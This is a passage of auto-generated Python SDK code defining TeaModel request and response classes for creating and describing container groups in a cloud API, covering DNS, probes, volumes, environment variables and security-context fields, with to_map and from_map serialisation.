result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class CreateContainerGroupRequestDnsConfig(TeaModel):
def __init__(self, name_server=None, search=None, option=None):
self.name_server = []
self.search = []
self.option = []
def validate(self):
if self.option:
for k in self.option:
if k :
k.validate()
def to_map(self):
result = {}
result['NameServer'] = []
if self.name_server is not None:
for k in self.name_server:
result['NameServer'].append(k)
else:
result['NameServer'] = None
result['Search'] = []
if self.search is not None:
for k in self.search:
result['Search'].append(k)
else:
result['Search'] = None
result['Option'] = []
if self.option is not None:
for k in self.option:
result['Option'].append(k.to_map() if k else None)
else:
result['Option'] = None
return result
def from_map(self, map={}):
self.name_server = []
if map.get('NameServer') is not None:
for k in map.get('NameServer'):
self.name_server.append(k)
else:
self.name_server = None
self.search = []
if map.get('Search') is not None:
for k in map.get('Search'):
self.search.append(k)
else:
self.search = None
self.option = []
if map.get('Option') is not None:
for k in map.get('Option'):
temp_model = CreateContainerGroupRequestDnsConfigOption()
temp_model = temp_model.from_map(k)
self.option.append(temp_model)
else:
self.option = None
return self
class CreateContainerGroupRequestHostAliase(TeaModel):
def __init__(self, ip=None, hostname=None):
self.ip = ip
self.hostname = []
def validate(self):
self.validate_required(self.hostname, 'hostname')
def to_map(self):
result = {}
result['Ip'] = self.ip
result['Hostname'] = []
if self.hostname is not None:
for k in self.hostname:
result['Hostname'].append(k)
else:
result['Hostname'] = None
return result
def from_map(self, map={}):
self.ip = map.get('Ip')
self.hostname = []
if map.get('Hostname') is not None:
for k in map.get('Hostname'):
self.hostname.append(k)
else:
self.hostname = None
return self
class CreateContainerGroupRequestArn(TeaModel):
def __init__(self, role_arn=None, role_type=None, assume_role_for=None):
self.role_arn = role_arn
self.role_type = role_type
self.assume_role_for = assume_role_for
def validate(self):
pass
def to_map(self):
result = {}
result['RoleArn'] = self.role_arn
result['RoleType'] = self.role_type
result['AssumeRoleFor'] = self.assume_role_for
return result
def from_map(self, map={}):
self.role_arn = map.get('RoleArn')
self.role_type = map.get('RoleType')
self.assume_role_for = map.get('AssumeRoleFor')
return self
class CreateContainerGroupRequestSecurityContextSysctl(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
pass
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class CreateContainerGroupRequestSecurityContext(TeaModel):
def __init__(self, sysctl=None):
self.sysctl = []
def validate(self):
if self.sysctl:
for k in self.sysctl:
if k :
k.validate()
def to_map(self):
result = {}
result['Sysctl'] = []
if self.sysctl is not None:
for k in self.sysctl:
result['Sysctl'].append(k.to_map() if k else None)
else:
result['Sysctl'] = None
return result
def from_map(self, map={}):
self.sysctl = []
if map.get('Sysctl') is not None:
for k in map.get('Sysctl'):
temp_model = CreateContainerGroupRequestSecurityContextSysctl()
temp_model = temp_model.from_map(k)
self.sysctl.append(temp_model)
else:
self.sysctl = None
return self
class CreateContainerGroupResponse(TeaModel):
def __init__(self, request_id=None, container_group_id=None):
self.request_id = request_id
self.container_group_id = container_group_id
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.container_group_id, 'container_group_id')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['ContainerGroupId'] = self.container_group_id
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.container_group_id = map.get('ContainerGroupId')
return self
class DescribeContainerGroupsRequest(TeaModel):
def __init__(self, region_id=None, zone_id=None, v_switch_id=None, next_token=None, limit=None, tag=None, container_group_ids=None, container_group_name=None, status=None, resource_group_id=None, with_event=None):
self.region_id = region_id
self.zone_id = zone_id
self.v_switch_id = v_switch_id
self.next_token = next_token
self.limit = limit
self.tag = []
self.container_group_ids = container_group_ids
self.container_group_name = container_group_name
self.status = status
self.resource_group_id = resource_group_id
self.with_event = with_event
def validate(self):
self.validate_required(self.region_id, 'region_id')
if self.tag:
for k in self.tag:
if k :
k.validate()
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ZoneId'] = self.zone_id
result['VSwitchId'] = self.v_switch_id
result['NextToken'] = self.next_token
result['Limit'] = self.limit
result['Tag'] = []
if self.tag is not None:
for k in self.tag:
result['Tag'].append(k.to_map() if k else None)
else:
result['Tag'] = None
result['ContainerGroupIds'] = self.container_group_ids
result['ContainerGroupName'] = self.container_group_name
result['Status'] = self.status
result['ResourceGroupId'] = self.resource_group_id
result['WithEvent'] = self.with_event
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.zone_id = map.get('ZoneId')
self.v_switch_id = map.get('VSwitchId')
self.next_token = map.get('NextToken')
self.limit = map.get('Limit')
self.tag = []
if map.get('Tag') is not None:
for k in map.get('Tag'):
temp_model = DescribeContainerGroupsRequestTag()
temp_model = temp_model.from_map(k)
self.tag.append(temp_model)
else:
self.tag = None
self.container_group_ids = map.get('ContainerGroupIds')
self.container_group_name = map.get('ContainerGroupName')
self.status = map.get('Status')
self.resource_group_id = map.get('ResourceGroupId')
self.with_event = map.get('WithEvent')
return self
class DescribeContainerGroupsRequestTag(TeaModel):
def __init__(self, key=None, value=None):
self.key = key
self.value = value
def validate(self):
self.validate_required(self.key, 'key')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
return self
class DescribeContainerGroupsResponse(TeaModel):
def __init__(self, request_id=None, next_token=None, total_count=None, container_groups=None):
self.request_id = request_id
self.next_token = next_token
self.total_count = total_count
self.container_groups = []
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.next_token, 'next_token')
self.validate_required(self.total_count, 'total_count')
self.validate_required(self.container_groups, 'container_groups')
if self.container_groups:
for k in self.container_groups:
if k :
k.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['NextToken'] = self.next_token
result['TotalCount'] = self.total_count
result['ContainerGroups'] = []
if self.container_groups is not None:
for k in self.container_groups:
result['ContainerGroups'].append(k.to_map() if k else None)
else:
result['ContainerGroups'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.next_token = map.get('NextToken')
self.total_count = map.get('TotalCount')
self.container_groups = []
if map.get('ContainerGroups') is not None:
for k in map.get('ContainerGroups'):
temp_model = DescribeContainerGroupsResponseContainerGroups()
temp_model = temp_model.from_map(k)
self.container_groups.append(temp_model)
else:
self.container_groups = None
return self
class DescribeContainerGroupsResponseContainerGroupsTags(TeaModel):
def __init__(self, key=None, value=None):
self.key = key
self.value = value
def validate(self):
self.validate_required(self.key, 'key')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
return self
class DescribeContainerGroupsResponseContainerGroupsEvents(TeaModel):
def __init__(self, count=None, type=None, name=None, message=None, first_timestamp=None, last_timestamp=None, reason=None):
self.count = count
self.type = type
self.name = name
self.message = message
self.first_timestamp = first_timestamp
self.last_timestamp = last_timestamp
self.reason = reason
def validate(self):
self.validate_required(self.count, 'count')
self.validate_required(self.type, 'type')
self.validate_required(self.name, 'name')
self.validate_required(self.message, 'message')
self.validate_required(self.first_timestamp, 'first_timestamp')
self.validate_required(self.last_timestamp, 'last_timestamp')
self.validate_required(self.reason, 'reason')
def to_map(self):
result = {}
result['Count'] = self.count
result['Type'] = self.type
result['Name'] = self.name
result['Message'] = self.message
result['FirstTimestamp'] = self.first_timestamp
result['LastTimestamp'] = self.last_timestamp
result['Reason'] = self.reason
return result
def from_map(self, map={}):
self.count = map.get('Count')
self.type = map.get('Type')
self.name = map.get('Name')
self.message = map.get('Message')
self.first_timestamp = map.get('FirstTimestamp')
self.last_timestamp = map.get('LastTimestamp')
self.reason = map.get('Reason')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersVolumeMounts(TeaModel):
def __init__(self, name=None, mount_path=None, read_only=None):
self.name = name
self.mount_path = mount_path
self.read_only = read_only
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.mount_path, 'mount_path')
self.validate_required(self.read_only, 'read_only')
def to_map(self):
result = {}
result['Name'] = self.name
result['MountPath'] = self.mount_path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.mount_path = map.get('MountPath')
self.read_only = map.get('ReadOnly')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersPorts(TeaModel):
def __init__(self, port=None, protocol=None):
self.port = port
self.protocol = protocol
def validate(self):
self.validate_required(self.port, 'port')
self.validate_required(self.protocol, 'protocol')
def to_map(self):
result = {}
result['Port'] = self.port
result['Protocol'] = self.protocol
return result
def from_map(self, map={}):
self.port = map.get('Port')
self.protocol = map.get('Protocol')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVarsValueFromFieldRef(TeaModel):
def __init__(self, field_path=None):
self.field_path = field_path
def validate(self):
self.validate_required(self.field_path, 'field_path')
def to_map(self):
result = {}
result['FieldPath'] = self.field_path
return result
def from_map(self, map={}):
self.field_path = map.get('FieldPath')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVarsValueFrom(TeaModel):
def __init__(self, field_ref=None):
self.field_ref = field_ref
def validate(self):
self.validate_required(self.field_ref, 'field_ref')
if self.field_ref:
self.field_ref.validate()
def to_map(self):
result = {}
if self.field_ref is not None:
result['FieldRef'] = self.field_ref.to_map()
else:
result['FieldRef'] = None
return result
def from_map(self, map={}):
if map.get('FieldRef') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVarsValueFromFieldRef()
self.field_ref = temp_model.from_map(map['FieldRef'])
else:
self.field_ref = None
return self
class DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVars(TeaModel):
def __init__(self, key=None, value=None, value_from=None):
self.key = key
self.value = value
self.value_from = value_from
def validate(self):
self.validate_required(self.key, 'key')
self.validate_required(self.value, 'value')
self.validate_required(self.value_from, 'value_from')
if self.value_from:
self.value_from.validate()
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
if self.value_from is not None:
result['ValueFrom'] = self.value_from.to_map()
else:
result['ValueFrom'] = None
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
if map.get('ValueFrom') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVarsValueFrom()
self.value_from = temp_model.from_map(map['ValueFrom'])
else:
self.value_from = None
return self
class DescribeContainerGroupsResponseContainerGroupsContainersPreviousState(TeaModel):
def __init__(self, state=None, detail_status=None, exit_code=None, start_time=None, finish_time=None, reason=None, message=None, signal=None):
self.state = state
self.detail_status = detail_status
self.exit_code = exit_code
self.start_time = start_time
self.finish_time = finish_time
self.reason = reason
self.message = message
self.signal = signal
def validate(self):
self.validate_required(self.state, 'state')
self.validate_required(self.detail_status, 'detail_status')
self.validate_required(self.exit_code, 'exit_code')
self.validate_required(self.start_time, 'start_time')
self.validate_required(self.finish_time, 'finish_time')
self.validate_required(self.reason, 'reason')
self.validate_required(self.message, 'message')
self.validate_required(self.signal, 'signal')
def to_map(self):
result = {}
result['State'] = self.state
result['DetailStatus'] = self.detail_status
result['ExitCode'] = self.exit_code
result['StartTime'] = self.start_time
result['FinishTime'] = self.finish_time
result['Reason'] = self.reason
result['Message'] = self.message
result['Signal'] = self.signal
return result
def from_map(self, map={}):
self.state = map.get('State')
self.detail_status = map.get('DetailStatus')
self.exit_code = map.get('ExitCode')
self.start_time = map.get('StartTime')
self.finish_time = map.get('FinishTime')
self.reason = map.get('Reason')
self.message = map.get('Message')
self.signal = map.get('Signal')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersCurrentState(TeaModel):
def __init__(self, state=None, detail_status=None, exit_code=None, start_time=None, finish_time=None, reason=None, message=None, signal=None):
self.state = state
self.detail_status = detail_status
self.exit_code = exit_code
self.start_time = start_time
self.finish_time = finish_time
self.reason = reason
self.message = message
self.signal = signal
def validate(self):
self.validate_required(self.state, 'state')
self.validate_required(self.detail_status, 'detail_status')
self.validate_required(self.exit_code, 'exit_code')
self.validate_required(self.start_time, 'start_time')
self.validate_required(self.finish_time, 'finish_time')
self.validate_required(self.reason, 'reason')
self.validate_required(self.message, 'message')
self.validate_required(self.signal, 'signal')
def to_map(self):
result = {}
result['State'] = self.state
result['DetailStatus'] = self.detail_status
result['ExitCode'] = self.exit_code
result['StartTime'] = self.start_time
result['FinishTime'] = self.finish_time
result['Reason'] = self.reason
result['Message'] = self.message
result['Signal'] = self.signal
return result
def from_map(self, map={}):
self.state = map.get('State')
self.detail_status = map.get('DetailStatus')
self.exit_code = map.get('ExitCode')
self.start_time = map.get('StartTime')
self.finish_time = map.get('FinishTime')
self.reason = map.get('Reason')
self.message = map.get('Message')
self.signal = map.get('Signal')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbeHttpGet(TeaModel):
def __init__(self, path=None, port=None, scheme=None):
self.path = path
self.port = port
self.scheme = scheme
def validate(self):
self.validate_required(self.path, 'path')
self.validate_required(self.port, 'port')
self.validate_required(self.scheme, 'scheme')
def to_map(self):
result = {}
result['Path'] = self.path
result['Port'] = self.port
result['Scheme'] = self.scheme
return result
def from_map(self, map={}):
self.path = map.get('Path')
self.port = map.get('Port')
self.scheme = map.get('Scheme')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbeTcpSocket(TeaModel):
def __init__(self, host=None, port=None):
self.host = host
self.port = port
def validate(self):
self.validate_required(self.host, 'host')
self.validate_required(self.port, 'port')
def to_map(self):
result = {}
result['Host'] = self.host
result['Port'] = self.port
return result
def from_map(self, map={}):
self.host = map.get('Host')
self.port = map.get('Port')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbe(TeaModel):
def __init__(self, initial_delay_seconds=None, period_seconds=None, timeout_seconds=None, success_threshold=None, failure_threshold=None, http_get=None, tcp_socket=None, execs=None):
self.initial_delay_seconds = initial_delay_seconds
self.period_seconds = period_seconds
self.timeout_seconds = timeout_seconds
self.success_threshold = success_threshold
self.failure_threshold = failure_threshold
self.http_get = http_get
self.tcp_socket = tcp_socket
self.execs = []
def validate(self):
self.validate_required(self.initial_delay_seconds, 'initial_delay_seconds')
self.validate_required(self.period_seconds, 'period_seconds')
self.validate_required(self.timeout_seconds, 'timeout_seconds')
self.validate_required(self.success_threshold, 'success_threshold')
self.validate_required(self.failure_threshold, 'failure_threshold')
self.validate_required(self.http_get, 'http_get')
if self.http_get:
self.http_get.validate()
self.validate_required(self.tcp_socket, 'tcp_socket')
if self.tcp_socket:
self.tcp_socket.validate()
self.validate_required(self.execs, 'execs')
def to_map(self):
result = {}
result['InitialDelaySeconds'] = self.initial_delay_seconds
result['PeriodSeconds'] = self.period_seconds
result['TimeoutSeconds'] = self.timeout_seconds
result['SuccessThreshold'] = self.success_threshold
result['FailureThreshold'] = self.failure_threshold
if self.http_get is not None:
result['HttpGet'] = self.http_get.to_map()
else:
result['HttpGet'] = None
if self.tcp_socket is not None:
result['TcpSocket'] = self.tcp_socket.to_map()
else:
result['TcpSocket'] = None
result['Execs'] = []
if self.execs is not None:
for k in self.execs:
result['Execs'].append(k)
else:
result['Execs'] = None
return result
def from_map(self, map={}):
self.initial_delay_seconds = map.get('InitialDelaySeconds')
self.period_seconds = map.get('PeriodSeconds')
self.timeout_seconds = map.get('TimeoutSeconds')
self.success_threshold = map.get('SuccessThreshold')
self.failure_threshold = map.get('FailureThreshold')
if map.get('HttpGet') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbeHttpGet()
self.http_get = temp_model.from_map(map['HttpGet'])
else:
self.http_get = None
if map.get('TcpSocket') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbeTcpSocket()
self.tcp_socket = temp_model.from_map(map['TcpSocket'])
else:
self.tcp_socket = None
self.execs = []
if map.get('Execs') is not None:
for k in map.get('Execs'):
self.execs.append(k)
else:
self.execs = None
return self
class DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbeHttpGet(TeaModel):
def __init__(self, path=None, port=None, scheme=None):
self.path = path
self.port = port
self.scheme = scheme
def validate(self):
self.validate_required(self.path, 'path')
self.validate_required(self.port, 'port')
self.validate_required(self.scheme, 'scheme')
def to_map(self):
result = {}
result['Path'] = self.path
result['Port'] = self.port
result['Scheme'] = self.scheme
return result
def from_map(self, map={}):
self.path = map.get('Path')
self.port = map.get('Port')
self.scheme = map.get('Scheme')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbeTcpSocket(TeaModel):
def __init__(self, host=None, port=None):
self.host = host
self.port = port
def validate(self):
self.validate_required(self.host, 'host')
self.validate_required(self.port, 'port')
def to_map(self):
result = {}
result['Host'] = self.host
result['Port'] = self.port
return result
def from_map(self, map={}):
self.host = map.get('Host')
self.port = map.get('Port')
return self
class DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbe(TeaModel):
def __init__(self, initial_delay_seconds=None, period_seconds=None, timeout_seconds=None, success_threshold=None, failure_threshold=None, http_get=None, tcp_socket=None, execs=None):
self.initial_delay_seconds = initial_delay_seconds
self.period_seconds = period_seconds
self.timeout_seconds = timeout_seconds
self.success_threshold = success_threshold
self.failure_threshold = failure_threshold
self.http_get = http_get
self.tcp_socket = tcp_socket
self.execs = []
def validate(self):
self.validate_required(self.initial_delay_seconds, 'initial_delay_seconds')
self.validate_required(self.period_seconds, 'period_seconds')
self.validate_required(self.timeout_seconds, 'timeout_seconds')
self.validate_required(self.success_threshold, 'success_threshold')
self.validate_required(self.failure_threshold, 'failure_threshold')
self.validate_required(self.http_get, 'http_get')
if self.http_get:
self.http_get.validate()
self.validate_required(self.tcp_socket, 'tcp_socket')
if self.tcp_socket:
self.tcp_socket.validate()
self.validate_required(self.execs, 'execs')
def to_map(self):
result = {}
result['InitialDelaySeconds'] = self.initial_delay_seconds
result['PeriodSeconds'] = self.period_seconds
result['TimeoutSeconds'] = self.timeout_seconds
result['SuccessThreshold'] = self.success_threshold
result['FailureThreshold'] = self.failure_threshold
if self.http_get is not None:
result['HttpGet'] = self.http_get.to_map()
else:
result['HttpGet'] = None
if self.tcp_socket is not None:
result['TcpSocket'] = self.tcp_socket.to_map()
else:
result['TcpSocket'] = None
result['Execs'] = []
if self.execs is not None:
for k in self.execs:
result['Execs'].append(k)
else:
result['Execs'] = None
return result
def from_map(self, map={}):
self.initial_delay_seconds = map.get('InitialDelaySeconds')
self.period_seconds = map.get('PeriodSeconds')
self.timeout_seconds = map.get('TimeoutSeconds')
self.success_threshold = map.get('SuccessThreshold')
self.failure_threshold = map.get('FailureThreshold')
if map.get('HttpGet') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbeHttpGet()
self.http_get = temp_model.from_map(map['HttpGet'])
else:
self.http_get = None
if map.get('TcpSocket') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbeTcpSocket()
self.tcp_socket = temp_model.from_map(map['TcpSocket'])
else:
self.tcp_socket = None
self.execs = []
if map.get('Execs') is not None:
for k in map.get('Execs'):
self.execs.append(k)
else:
self.execs = None
return self
class DescribeContainerGroupsResponseContainerGroupsContainersSecurityContextCapability(TeaModel):
def __init__(self, adds=None):
self.adds = []
def validate(self):
self.validate_required(self.adds, 'adds')
def to_map(self):
result = {}
result['Adds'] = []
if self.adds is not None:
for k in self.adds:
result['Adds'].append(k)
else:
result['Adds'] = None
return result
def from_map(self, map={}):
self.adds = []
if map.get('Adds') is not None:
for k in map.get('Adds'):
self.adds.append(k)
else:
self.adds = None
return self
class DescribeContainerGroupsResponseContainerGroupsContainersSecurityContext(TeaModel):
def __init__(self, read_only_root_filesystem=None, run_as_user=None, capability=None):
self.read_only_root_filesystem = read_only_root_filesystem
self.run_as_user = run_as_user
self.capability = capability
def validate(self):
self.validate_required(self.read_only_root_filesystem, 'read_only_root_filesystem')
self.validate_required(self.run_as_user, 'run_as_user')
self.validate_required(self.capability, 'capability')
if self.capability:
self.capability.validate()
def to_map(self):
result = {}
result['ReadOnlyRootFilesystem'] = self.read_only_root_filesystem
result['RunAsUser'] = self.run_as_user
if self.capability is not None:
result['Capability'] = self.capability.to_map()
else:
result['Capability'] = None
return result
def from_map(self, map={}):
self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
self.run_as_user = map.get('RunAsUser')
if map.get('Capability') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersSecurityContextCapability()
self.capability = temp_model.from_map(map['Capability'])
else:
self.capability = None
return self
class DescribeContainerGroupsResponseContainerGroupsContainers(TeaModel):
def __init__(self, name=None, image=None, memory=None, cpu=None, restart_count=None, working_dir=None, image_pull_policy=None, ready=None, gpu=None, stdin=None, stdin_once=None, tty=None, volume_mounts=None, ports=None, environment_vars=None, previous_state=None, current_state=None, readiness_probe=None, liveness_probe=None, security_context=None, commands=None, args=None):
self.name = name
self.image = image
self.memory = memory
self.cpu = cpu
self.restart_count = restart_count
self.working_dir = working_dir
self.image_pull_policy = image_pull_policy
self.ready = ready
self.gpu = gpu
self.stdin = stdin
self.stdin_once = stdin_once
self.tty = tty
self.volume_mounts = []
self.ports = []
self.environment_vars = []
self.previous_state = previous_state
self.current_state = current_state
self.readiness_probe = readiness_probe
self.liveness_probe = liveness_probe
self.security_context = security_context
self.commands = []
self.args = []
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.image, 'image')
self.validate_required(self.memory, 'memory')
self.validate_required(self.cpu, 'cpu')
self.validate_required(self.restart_count, 'restart_count')
self.validate_required(self.working_dir, 'working_dir')
self.validate_required(self.image_pull_policy, 'image_pull_policy')
self.validate_required(self.ready, 'ready')
self.validate_required(self.gpu, 'gpu')
self.validate_required(self.stdin, 'stdin')
self.validate_required(self.stdin_once, 'stdin_once')
self.validate_required(self.tty, 'tty')
self.validate_required(self.volume_mounts, 'volume_mounts')
if self.volume_mounts:
for k in self.volume_mounts:
if k :
k.validate()
self.validate_required(self.ports, 'ports')
if self.ports:
for k in self.ports:
if k :
k.validate()
self.validate_required(self.environment_vars, 'environment_vars')
if self.environment_vars:
for k in self.environment_vars:
if k :
k.validate()
self.validate_required(self.previous_state, 'previous_state')
if self.previous_state:
self.previous_state.validate()
self.validate_required(self.current_state, 'current_state')
if self.current_state:
self.current_state.validate()
self.validate_required(self.readiness_probe, 'readiness_probe')
if self.readiness_probe:
self.readiness_probe.validate()
self.validate_required(self.liveness_probe, 'liveness_probe')
if self.liveness_probe:
self.liveness_probe.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
self.validate_required(self.commands, 'commands')
self.validate_required(self.args, 'args')
def to_map(self):
result = {}
result['Name'] = self.name
result['Image'] = self.image
result['Memory'] = self.memory
result['Cpu'] = self.cpu
result['RestartCount'] = self.restart_count
result['WorkingDir'] = self.working_dir
result['ImagePullPolicy'] = self.image_pull_policy
result['Ready'] = self.ready
result['Gpu'] = self.gpu
result['Stdin'] = self.stdin
result['StdinOnce'] = self.stdin_once
result['Tty'] = self.tty
result['VolumeMounts'] = []
if self.volume_mounts is not None:
for k in self.volume_mounts:
result['VolumeMounts'].append(k.to_map() if k else None)
else:
result['VolumeMounts'] = None
result['Ports'] = []
if self.ports is not None:
for k in self.ports:
result['Ports'].append(k.to_map() if k else None)
else:
result['Ports'] = None
result['EnvironmentVars'] = []
if self.environment_vars is not None:
for k in self.environment_vars:
result['EnvironmentVars'].append(k.to_map() if k else None)
else:
result['EnvironmentVars'] = None
if self.previous_state is not None:
result['PreviousState'] = self.previous_state.to_map()
else:
result['PreviousState'] = None
if self.current_state is not None:
result['CurrentState'] = self.current_state.to_map()
else:
result['CurrentState'] = None
if self.readiness_probe is not None:
result['ReadinessProbe'] = self.readiness_probe.to_map()
else:
result['ReadinessProbe'] = None
if self.liveness_probe is not None:
result['LivenessProbe'] = self.liveness_probe.to_map()
else:
result['LivenessProbe'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
result['Commands'] = []
if self.commands is not None:
for k in self.commands:
result['Commands'].append(k)
else:
result['Commands'] = None
result['Args'] = []
if self.args is not None:
for k in self.args:
result['Args'].append(k)
else:
result['Args'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.image = map.get('Image')
self.memory = map.get('Memory')
self.cpu = map.get('Cpu')
self.restart_count = map.get('RestartCount')
self.working_dir = map.get('WorkingDir')
self.image_pull_policy = map.get('ImagePullPolicy')
self.ready = map.get('Ready')
self.gpu = map.get('Gpu')
self.stdin = map.get('Stdin')
self.stdin_once = map.get('StdinOnce')
self.tty = map.get('Tty')
self.volume_mounts = []
if map.get('VolumeMounts') is not None:
for k in map.get('VolumeMounts'):
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersVolumeMounts()
temp_model = temp_model.from_map(k)
self.volume_mounts.append(temp_model)
else:
self.volume_mounts = None
self.ports = []
if map.get('Ports') is not None:
for k in map.get('Ports'):
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersPorts()
temp_model = temp_model.from_map(k)
self.ports.append(temp_model)
else:
self.ports = None
self.environment_vars = []
if map.get('EnvironmentVars') is not None:
for k in map.get('EnvironmentVars'):
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVars()
temp_model = temp_model.from_map(k)
self.environment_vars.append(temp_model)
else:
self.environment_vars = None
if map.get('PreviousState') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersPreviousState()
self.previous_state = temp_model.from_map(map['PreviousState'])
else:
self.previous_state = None
if map.get('CurrentState') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersCurrentState()
self.current_state = temp_model.from_map(map['CurrentState'])
else:
self.current_state = None
if map.get('ReadinessProbe') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbe()
self.readiness_probe = temp_model.from_map(map['ReadinessProbe'])
else:
self.readiness_probe = None
if map.get('LivenessProbe') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbe()
self.liveness_probe = temp_model.from_map(map['LivenessProbe'])
else:
self.liveness_probe = None
if map.get('SecurityContext') is not None:
temp_model = DescribeContainerGroupsResponseContainerGroupsContainersSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
self.commands = []
if map.get('Commands') is not None:
for k in map.get('Commands'):
self.commands.append(k)
else:
self.commands = None
self.args = []
if map.get('Args') is not None:
for k in map.get('Args'):
self.args.append(k)
else:
self.args = None
return self
class DescribeContainerGroupsResponseContainerGroupsVolumesConfigFileVolumeConfigFileToPaths(TeaModel):
def __init__(self, content=None, path=None):
self.content = content
self.path = path
def validate(self):
self.validate_required(self.content, 'content')
self.validate_required(self.path, 'path')
def to_map(self):
result = {}
result['Content'] = self.content
result['Path'] = self.path
return result
def from_map(self, map={}):
self.content = map.get('Content')
self.path = map.get('Path')
return self
class DescribeContainerGroupsResponseContainerGroupsVolumes(TeaModel):
def __init__(self, type=None, name=None, nfsvolume_path=None, nfsvolume_server=None, nfsvolume_read_only=None, disk_volume_disk_id=None, disk_volume_fs_type=None, flex_volume_driver=None, flex_volume_fs_type=None, flex_volume_options=None, config_file_volume_config_file_to_paths=None):
self.type = type
self.name = name
self.nfsvolume_path = nfsvolume_path
self.nfsvolume_server = nfsvolume_server
self.nfsvolume_read_only = nfsvolume_read_only
self.disk_volume_disk_id = disk_volume_disk_id
self.disk_volume_fs_type = disk_volume_fs_type
self.flex_volume_driver = flex_volume_driver
self.flex_volume_fs_type = flex_volume_fs_type
self.flex_volume_options = flex_volume_options
self.config_file_volume_config_file_to_paths = []
def validate(self):
self.validate_required(self.type, 'type')
self.validate_required(self.name, 'name')
self.validate_required(self.nfsvolume_path, 'nfsvolume_path')
self.validate_required(self.nfsvolume_server, 'nfsvolume_server')
self.validate_required(self.nfsvolume_read_only, 'nfsvolume_read_only')
self.validate_required(self.disk_volume_disk_id, 'disk_volume_disk_id')
self.validate_required(self.disk_volume_fs_type, 'disk_volume_fs_type')
self.validate_required(self.flex_volume_driver, 'flex_volume_driver')
self.validate_required(self.flex_volume_fs_type, 'flex_volume_fs_type')
self.validate_required(self.flex_volume_options, 'flex_volume_options')
self.validate_required(self.config_file_volume_config_file_to_paths, 'config_file_volume_config_file_to_paths')
if self.config_file_volume_config_file_to_paths:
for k in self.config_file_volume_config_file_to_paths:
if k :
k.validate()
def to_map(self):
result = {}
result['Type'] = self.type
result['Name'] = self.name
result['NFSVolumePath'] = self.nfsvolume_path
result['NFSVolumeServer'] = self.nfsvolume_server
result['NFSVolumeReadOnly'] = self.nfsvolume_read_only
result['DiskVolumeDiskId'] = self.disk_volume_disk_id
result['DiskVolumeFsType'] = self.disk_volume_fs_type
result['FlexVolumeDriver'] = self.flex_volume_driver
result['FlexVolumeFsType'] = self.flex_volume_fs_type
result['FlexVolumeOptions'] = self.flex_volume_options
result['ConfigFileVolumeConfigFileToPaths'] = []
if self.config_file_volume_config_file_to_paths is not None:
for k in self.config_file_volume_config_file_to_paths:
result['ConfigFileVolumeConfigFileToPaths'].append(k.to_map() if k else None)
else:
result['ConfigFileVolumeConfigFileToPaths'] = None
return result
def from_map(self, map={}):
self.type = map.get('Type')
self.name = map.get('Name')
self.nfsvolume_path = map.get('NFSVolumePath')
self.nfsvolume_server = map.get('NFSVolumeServer')
self.nfsvolume_read_only = map.get('NFSVolumeReadOnly')
self.disk_volume_disk_id = map.get('DiskVolumeDiskId')
self.disk_volume_fs_type = map.get('DiskVolumeFsType')
self.flex_volume_driver = map.get('FlexVolumeDriver')
self.flex_volume_fs_type = map.get('FlexVolumeFsType')
